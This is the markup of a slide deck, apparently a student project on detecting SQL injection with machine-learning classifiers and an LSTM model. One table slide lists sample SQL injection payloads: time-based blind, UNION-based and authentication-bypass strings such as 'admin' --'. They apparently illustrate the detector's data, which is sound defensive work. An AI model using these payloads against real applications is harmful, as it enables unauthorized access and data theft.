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02" r:id="rId2"/>
  </p:sldMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId3"/>
    <p:sldId id="257" r:id="rId4"/>
    <p:sldId id="341" r:id="rId5"/>
    <p:sldId id="258" r:id="rId6"/>
    <p:sldId id="259" r:id="rId7"/>
    <p:sldId id="306" r:id="rId8"/>
    <p:sldId id="318" r:id="rId9"/>
    <p:sldId id="307" r:id="rId10"/>
    <p:sldId id="310" r:id="rId11"/>
    <p:sldId id="353" r:id="rId12"/>
    <p:sldId id="311" r:id="rId13"/>
    <p:sldId id="312" r:id="rId14"/>
    <p:sldId id="315" r:id="rId15"/>
    <p:sldId id="346" r:id="rId16"/>
    <p:sldId id="313" r:id="rId17"/>
    <p:sldId id="347" r:id="rId18"/>
    <p:sldId id="350" r:id="rId19"/>
    <p:sldId id="348" r:id="rId20"/>
    <p:sldId id="351" r:id="rId21"/>
    <p:sldId id="349" r:id="rId22"/>
    <p:sldId id="320" r:id="rId23"/>
    <p:sldId id="322" r:id="rId24"/>
    <p:sldId id="321" r:id="rId25"/>
    <p:sldId id="342" r:id="rId26"/>
    <p:sldId id="352" r:id="rId27"/>
    <p:sldId id="324" r:id="rId28"/>
    <p:sldId id="325" r:id="rId29"/>
    <p:sldId id="326" r:id="rId30"/>
    <p:sldId id="327" r:id="rId31"/>
    <p:sldId id="357" r:id="rId32"/>
    <p:sldId id="356" r:id="rId33"/>
    <p:sldId id="358" r:id="rId34"/>
    <p:sldId id="359" r:id="rId35"/>
    <p:sldId id="328" r:id="rId36"/>
    <p:sldId id="362" r:id="rId37"/>
    <p:sldId id="329" r:id="rId38"/>
    <p:sldId id="331" r:id="rId39"/>
    <p:sldId id="334" r:id="rId40"/>
    <p:sldId id="335" r:id="rId41"/>
    <p:sldId id="336" r:id="rId42"/>
    <p:sldId id="337" r:id="rId43"/>
    <p:sldId id="278" r:id="rId44"/>
    <p:sldId id="279" r:id="rId45"/>
    <p:sldId id="338" r:id="rId46"/>
    <p:sldId id="340" r:id="rId47"/>
    <p:sldId id="339" r:id="rId48"/>
    <p:sldId id="363" r:id="rId49"/>
    <p:sldId id="365" r:id="rId50"/>
    <p:sldId id="330" r:id="rId51"/>
  </p:sldIdLst>
  <p:sldSz cx="18288000" cy="10287000"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
      <p:bold r:id="rId52"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Calisto MT" panose="02040603050505030304" pitchFamily="18" charset="0"/>
      <p:regular r:id="rId53"/>
      <p:bold r:id="rId54"/>
      <p:italic r:id="rId55"/>
      <p:boldItalic r:id="rId56"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Oswald Bold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51" d="100"/>
          <a:sy n="51" d="100"/>
        </p:scale>
        <p:origin x="93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B7CF-C760-28B8-0813-AA70340EE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EF673-FF0D-0F28-10BC-1BA969226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C50D6-C141-6352-4171-582341D0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81FF9-6B72-9F00-CC14-2AF265EB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B3C5C-0306-7790-2665-98BFFACC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5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B221-DD4B-2617-15E4-2EDE5045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8DC40-B680-10E4-1135-5EA91E4D8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8BA44-ABD3-82AE-6D84-72444AA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16356-6B41-B9DA-BB40-D29762B94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AB8A-28DA-E2CF-C0DB-1A7D2312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2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E4114-1C42-983C-6866-7C46BB6D6F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FC9E2-9851-06CB-BAF1-7254B7C11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5701B-C255-538A-04AE-C912D605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4ECA2-1755-21EE-1B89-18E70B34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621B7-37CD-AC99-D5C5-FDA4934A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99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43C0-6BB2-C990-770A-56BC7960C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5908F-F7CA-96CE-5F4C-EC48E65E8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9260F-66CC-2758-2F7C-5EEFDE29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C3B5A-C7D7-3577-219A-0801D6BF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6DC25-BAAA-18FD-1E87-F262C66F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9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1202-0BA9-7A25-E7A3-10638E16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5FEC-CEBF-50FF-673F-3AA47E96D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B8FA5-8B67-C4EE-7F0B-9C45B344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DEE77-62A9-E244-1505-0246669A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F884-504C-1680-7BA1-E7D4B6F4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09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4B0E-528B-9B4A-C426-49B487B3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9FFB-0646-81F6-3AC2-2D3939E7C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420FA-1CEE-0140-4A2D-5BCB7C86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FBD7E-46D4-F4B8-B39B-8955BAA4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7C888-8D59-50C2-BCC8-2679824C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50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ECE4-75CC-3AD0-F501-7A8DE30B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504E-AE54-70DB-3BA2-69C60E919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AEA7E-85C2-9E77-4A0B-40938961E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88933-5EEA-3EE8-121B-72E28ED5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740D8-F69F-31BE-BC83-37BE9BF2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C48CA-F7E2-0920-503B-3CA14537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02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0846-68DE-0D6A-FC2E-720AD237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48479-12E6-550F-4729-2B6E56A8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542B4-3148-8EC2-8385-D9312E35F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EAB52-E230-8989-03C1-AE40B565D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9F01A-2FEC-E2F8-A603-B9F2AB560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44AC1E-365D-4E0E-87B9-66C971018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7F804-8908-1A08-20D4-310B6FE6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A3717-B44B-06EC-46D7-CE1F064D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5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9BB3-B999-12EC-A450-2D7B5887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83239-AA6A-D3F1-624D-89774C46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22F71-BAA9-FD6D-4E9C-4AC7A285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2507D-CE88-B8CE-CC26-150EFDA9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14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0DBDF-052E-E6CB-BE0A-E5F9BC01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43FCB-630A-846E-09C1-4D21EC4C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85721-B670-1741-1B94-27CDE47E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43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A390-A972-39C1-5842-04B2420B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E3750-2269-EE0B-E547-860BA0378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525B5-5588-3FCB-6735-23A761D2F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B9BE9-67F8-304D-EEBB-5A97BF21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2DAD3-4B76-D21C-B47E-08DA609A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55599-04BB-3BD1-D284-5A8ECEA9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9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B17F-9E25-DFBB-CA3F-B53D742C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8F64-E26F-782A-65BE-075237F71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77A4F-29D8-C471-910A-AFCD65B8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26F0A-7576-C2EA-4C48-FAAB6B54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2C417-E223-CE5E-ECCD-7FA1E850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95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64EF-1D01-AC7A-6F48-5E2AB1DC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5C502B-C0BD-7B5F-51F4-CFBE019AE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FC903-D8F5-B92A-FC97-FAB5C9CCB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E42BB-36B4-99B7-3458-E290C3D4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35D0C-E4BB-E353-E32E-5C44BECB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C5377-69A4-B793-BCA7-AF15B2C8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16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E4F8-8D62-4B08-37A2-22916739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C608F-53F7-8015-C16B-96A1BFE01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CC2E8-8D9C-4D53-566B-427D486F3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3F83A-E7CC-FEF2-334A-40032D8A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2F7BA-9412-DABB-FFD3-AA776D66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44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5254D-33FD-8526-7D2A-78F2CE4676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32A3B-92C8-8334-9B3E-9C9C57AB5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F5C77-DF74-C3A1-3733-BB6409F7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BBB84-F814-2F64-18A3-9875208F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77380-5E27-AE1A-9241-5130E774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86E7-6040-1C24-AA33-1A7D9942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185F0-5ED1-74EE-88D5-5B0141C7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703A-C307-1B0C-BEB7-A16BBD05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95F9F-821B-7507-08D9-6DA1FC54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00031-A962-D121-4DD1-F7C6B4B3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9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A997-0B9E-1F5F-04FF-E3C18D93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AE517-600C-72E6-260F-A43BB0749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5CAC5-C4D8-C1F0-620A-C5411284F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E38D2-271E-4D6C-1EC3-F3E6E20A1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412E5-DD47-215A-473F-ABE9AAED7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8314E-FF34-3F83-B2D4-CEF1C78F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2092-C540-8B67-DF02-3FD230F9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A8605-D959-B3EE-02C0-3B6C614B0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5184E-000C-7237-18A2-33616509F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59589-9569-9027-9902-1BC8F84A6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B149E-4A90-FF28-B048-7F56BD8E97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461BED-1C45-7ED9-BDA6-3DFF95A2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E24DF2-1AFB-DADE-083F-4C8F8475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99BF38-D712-5ABD-B1F0-C7D3BEFA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2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397F-1A88-9098-145D-27C03AE5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97F97-83DB-E84F-A9D5-54815F7E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316AF-090E-B5AF-5BF1-0BD379D4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ABDE5-36C8-ED9C-A566-FCBD91DA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9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810FE-76B1-BC06-148C-6CF30F48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6DE7F-F1B9-7E36-0302-04429933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685CB-79CE-7445-8BF9-66570E13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A42D-B263-4869-73B1-C9DDC5CE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FB146-D0FA-DAD9-28BE-7E1A4F2E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A7C3E-5918-5061-40C6-5BF4B11E0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19FA7-0419-8D84-C796-73631F9A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F1044-8426-3207-3B30-5A07CD58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C063C-E82C-44D7-E665-796B6EED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3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BC42-1245-0988-A2EC-8ABD6186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3D6AE-8C7B-4181-E7EC-7F199776E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694F8-D169-41FE-C4B5-73E006717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1F2E5-397E-50AF-6A92-F3CB3E6A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FC303-E07D-5B37-E20D-376B13FA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A1BE2-2EC0-966E-AC25-25A753D0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1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96B-40EF-2CC1-C381-F3AE050D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FED4A-1A99-B7C2-3456-D6E7343CD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AF6B8-C49D-D55D-472E-AFC72B705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5F55D-0EE7-0989-D0EF-6D1664211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E8E1-600A-F5D4-BBDF-A1A399E70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87A5B-1A32-D625-262A-9E7B15FE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96C11-D01F-E860-DF88-2B5AD88DA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41B07-CF31-F454-116F-AA6621BC5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DE829-2833-45A8-B9A0-54B2F16AE4A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8834B-9275-416B-9184-271B71A7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305A-46A3-4B17-4ED8-1B364332D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C83B0-1990-4808-94F2-4441400ED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eeksforgeeks.org/sql-tutorial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1489" y="459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347" y="4348786"/>
            <a:ext cx="9815307" cy="250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9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SQL Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="9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6346" y="3736795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Automatic Detection of</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="7000" spc="692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3" y="7965717"/>
            <a:ext cx="12848809" cy="45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3000" b="1" spc="140" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="231F20"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Supervised by: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8E86A4ED-B37B-4B00-91CC-F4B03593BD00}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2719593" y="8563459"/>
            <a:ext cx="1284880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3500" spc="140" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="231F20"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Dr. Nehal Khaled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F9C8B4-EA57-4BF5-82F3-A733A5FD7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495301"/>
            <a:ext cx="1752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938538" y="79359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7200" y="250335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Increase Dataset</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="6500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6" name="Table 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{458578E7-DB9E-40ED-A910-E06B064A26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133870"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="457200" y="2171700"/>
          <a:ext cx="16998317" cy="7598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759">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2420462284"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="5815263">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20603805"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="7029295">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4122010156"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="83510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Blind SQL payloads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Union payloads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Postgre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SQL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Sql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injection Auth bypass Payloads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166067"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="284761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SELECT IF(1=1, SLEEP(5), 0)--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UNION ALL SELECT 1,2,3,4,5,6,7,8,9#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admin' --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admin' #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admin'/*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07901"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="162089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Id= 500 Union Select Sleep(5)--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UNION SELECT @@VERSION,SLEEP(5),USER()#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Admin’ or ‘1’=’1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Admin’ or ‘1’=’1’—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Admin’ or ‘1’=’1’#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07436"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="2294864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(SELECT *FROM (SELECT(SLEEP(5)))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ecMj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)--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UNION SELECT @@VERSION,SLEEP(5)#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'*' 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'&amp;'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'-'</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="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1355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'^'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58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7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CE709772-A202-4454-86FA-D4127125BBFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="0" y="-272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84AAE6E-51D2-44F3-98C1-E5F98871E42E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="49530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latin typeface="Calisto MT" panose="02040603050505030304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Yu Gothic Light" panose="020B0300000000000000" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>System architecture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10AE6C6-D3E8-417A-B880-44D76378E3D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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AEE9083A-3895-4D20-ACA8-7E816003A7AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="7659121">
            <a:off x="-4176539" y="671453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9185C4A0-8BC0-488B-8844-63171B75F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86100"/>
            <a:ext cx="1577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6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797722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24737" y="1257300"/>
            <a:ext cx="12086663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6500" b="1" spc="786" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calisto MT" panose="02040603050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Artificial intelligence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400" y="3510391"/>
            <a:ext cx="16382999" cy="6205109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A116BD-108C-43C4-AF7F-2D25EA920586}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1779814" y="4343400"/>
            <a:ext cx="10668000" cy="45639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4500" dirty="0"/>
              <a:t>Machine learning:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3500" dirty="0"/>
              <a:t>SVM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3500" dirty="0"/>
              <a:t>Naive-bayes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3500" dirty="0"/>
              <a:t>Decision-tree</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3500" dirty="0"/>
              <a:t>Random-forest</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3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4500" dirty="0"/>
              <a:t>Deep learning:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3500" dirty="0"/>
              <a:t>RNN-LSTM</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14156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6046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7200" y="-26670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SVM classifier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Content Placeholder 8" descr="A diagram of a technical support&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D0415EC-4A8A-48A8-80D6-CF72BEAFC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34635"/>
            <a:ext cx="12573000" cy="5609814"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeo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AF1005CC-DB62-4CA7-9909-028C1592ED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7775546"/>
            <a:ext cx="4648200" cy="2473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FA5C2-1197-47A1-81A0-EB02D61033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8495496"/>
            <a:ext cx="2155270" cy="1033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9D4C0-8025-4027-A2B2-4D88DFAC146A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4114800" y="7103358"/>
            <a:ext cx="67435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value and the sensitivity</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="59718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929139" y="5991716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09600" y="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  <a:defRPr/>
            </a:pP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Heatmap for SVM with RBF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9F300-DAF6-9FF6-93A1-C8A3056A17E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3365192" y="2362306"/>
            <a:ext cx="3031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Before increasing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6BFFD-6A19-E2B1-1850-9440ED7EFE43}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12288866" y="2331297"/>
            <a:ext cx="283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After increasing data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9" descr="A blue squares with numbers&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9509BC06-99E4-1CA0-3402-D5050A111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7" y="3162300"/>
            <a:ext cx="8288413" cy="6248400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11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4D47F4C9-65BD-CBDD-9823-1ACEB0FD8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015" y="3162300"/>
            <a:ext cx="838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6046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341611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Naïve-bayes classifier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Content Placeholder 18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7CC3A43-1D6A-4BAF-8309-419473B33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57500"/>
            <a:ext cx="15773400" cy="66294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34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929139" y="5991716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09600" y="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Heatmap for Naïve-bayes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9F300-DAF6-9FF6-93A1-C8A3056A17E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3365192" y="2362306"/>
            <a:ext cx="3031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Before increasing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6BFFD-6A19-E2B1-1850-9440ED7EFE43}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12288866" y="2331297"/>
            <a:ext cx="283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After increasing data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B893619F-284E-AD4A-C36B-DF869444C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36" y="3162300"/>
            <a:ext cx="8288413" cy="62484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553D273F-9BA4-B990-0BC5-B41960957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014" y="3128962"/>
            <a:ext cx="8381999" cy="62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6046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341611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Decision-tree classifier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root node&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F524BDF5-890C-3C2C-ABA1-2E306AAC1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4" y="2857500"/>
            <a:ext cx="158019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7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929139" y="5991716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09600" y="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Heatmap for Decision-tree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9F300-DAF6-9FF6-93A1-C8A3056A17E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3365192" y="2362306"/>
            <a:ext cx="3031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Before increasing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6BFFD-6A19-E2B1-1850-9440ED7EFE43}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12288866" y="2331297"/>
            <a:ext cx="283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After increasing data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11" descr="A blue squares with numbers&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51778143-E772-9504-69F6-F0BEF8A0F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62300"/>
            <a:ext cx="8381998" cy="6248400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 13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D1F70834-A6DB-6994-D3DE-9A7A6FBE7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014" y="3128962"/>
            <a:ext cx="8381998" cy="62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8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6046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33400" y="41910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Random-forest classifier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tree&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8675E4C5-3641-A64D-80C3-529F9339D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4" y="2712774"/>
            <a:ext cx="15601952" cy="70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91000" y="1057476"/>
            <a:ext cx="9525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</a:rPr>
              <a:t>TEAM MEMBERS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1504154" y="325468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096000" y="3861147"/>
            <a:ext cx="5790503" cy="47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483"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" spc="247" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="231F20"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> Abdelrahman Ahmed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96000" y="4653524"/>
            <a:ext cx="6076629" cy="47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483"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" spc="247" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="231F20"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> Ziad Ahmed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0" y="5573614"/>
            <a:ext cx="5790503" cy="47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483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4000" spc="247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4000" spc="247" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="231F20"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Abanoub</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" spc="247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4000" spc="247" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="231F20"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Ragheb</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" spc="247" dirty="0">
              <a:solidFill>
                <a:srgbClr val="231F20"/>
              </a:solidFill>
              <a:latin typeface="+mj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96000" y="6416782"/>
            <a:ext cx="6076629" cy="47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483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4000" spc="247" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="231F20"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> Mostafa Hamza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96000" y="7168676"/>
            <a:ext cx="6076629" cy="47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483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4000" spc="247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4000" spc="247" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="231F20"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Aml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" spc="247" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="231F20"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> Ali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96000" y="7961053"/>
            <a:ext cx="5790503" cy="47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483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4000" spc="247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4000" spc="247" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="231F20"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Bassema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" spc="247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4000" spc="247" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="231F20"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Abdelrazik</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" spc="247" dirty="0">
              <a:solidFill>
                <a:srgbClr val="231F2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929139" y="5991716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09600" y="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Heatmap for </a:t>
            </a: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Random-forest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9F300-DAF6-9FF6-93A1-C8A3056A17E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3365192" y="2362306"/>
            <a:ext cx="3031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Before increasing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6BFFD-6A19-E2B1-1850-9440ED7EFE43}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12288866" y="2331297"/>
            <a:ext cx="283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After increasing data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="A blue squares with numbers&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB52D755-A741-469D-35C4-5B08632AB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" y="3150697"/>
            <a:ext cx="8377238" cy="6260003"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 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A6B1B1FC-7790-9057-87D0-17B54684E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014" y="3150696"/>
            <a:ext cx="8377238" cy="62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786140" y="7296421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190352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RNN</a:t>
            </a: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-LSTM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BC9EF-6852-495D-390D-C4EAF7A7FEAC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295400" y="2324100"/>
            <a:ext cx="1584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Layer: Accepts input sequences.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Layer : Converts words to dense vectors.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LSTM Layer 1: First bidirectional LSTM layer with 256 units, returning sequences.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 1: Applies dropout with a rate of 0.3 to prevent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LSTM Layer 2: Second bidirectional LSTM layer with 256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Layer 1: Fully connected layer with 128 units and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 2: Another dropout layer with a rate of 0.3.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Layer 2: Fully connected layer with 1 unit and sigmoid activation for binary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Layer: Outputs the final probability.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9497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2443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505200" y="-3494291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447800" y="997493"/>
            <a:ext cx="15916275" cy="1250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6000" b="1" spc="786" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calisto MT" panose="02040603050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>StratifiedKFold</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6000" b="1" spc="786" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calisto MT" panose="02040603050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6000" b="1" spc="786" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calisto MT" panose="02040603050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>early_stopping</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="6000" b="1" spc="786" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Calisto MT" panose="0204060305050503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2998" y="3669266"/>
            <a:ext cx="16001999" cy="6052709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00200" y="4305300"/>
            <a:ext cx="62484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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="45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stratifiedKFold</a:t>
            </a:r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1D8F3E-E2B1-8B2A-4654-9AA04CBA3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295900"/>
            <a:ext cx="8839200" cy="1640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FB64AD-6CC3-770A-567E-4E278A90F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8343900"/>
            <a:ext cx="10334625" cy="990600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
